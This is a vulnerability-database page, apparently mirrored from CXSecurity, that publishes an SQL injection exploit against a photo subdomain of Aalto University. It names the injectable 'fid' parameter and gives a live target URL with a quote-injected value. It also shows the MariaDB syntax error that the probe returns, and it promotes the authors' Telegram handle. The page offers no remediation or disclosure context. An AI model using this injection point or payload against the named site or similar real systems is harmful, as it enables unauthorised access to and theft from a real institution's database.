Aalto University subdomain SQLi - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1737729 漏洞类型
发布时间 2019-09-12 更新时间 2019-09-12
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019090091
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title:Aalto University subdomain SQLi
# Date:  10 Sep 2019                                             
# Author: H.BBF3.4 & A.BBF3.4                                                            
+++++++++++++++++++++++++

ABOUT Aalto University:
Aalto University Executive Education Ltd offers executive education and leadership development services in 12 countries. Aalto EE is owned by Aalto University, Aalto EE has an office in Helsinki that coordinates operations in Europe and an office in Singapore for the Asia Pacific rim.
Aalto EE is ranked in Financial Times Executive Education and Executive MBA rankings. Aalto EE ranked 39th globally in the Financial Times Executive Education overall ranking in 2018. Aalto Executive MBA program ranked 78th in 2017
++++++++++++++++++++++++++

# SQL Injection Exploit :
**********************
view.php?fid=


# Example Vulnerable Sites :
*************************
[+] https://foto.aalto.fi/opetus/foto/view.php?fid=1688%27



t.me/thebughunter


# Example SQL Database Error :
****************************
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1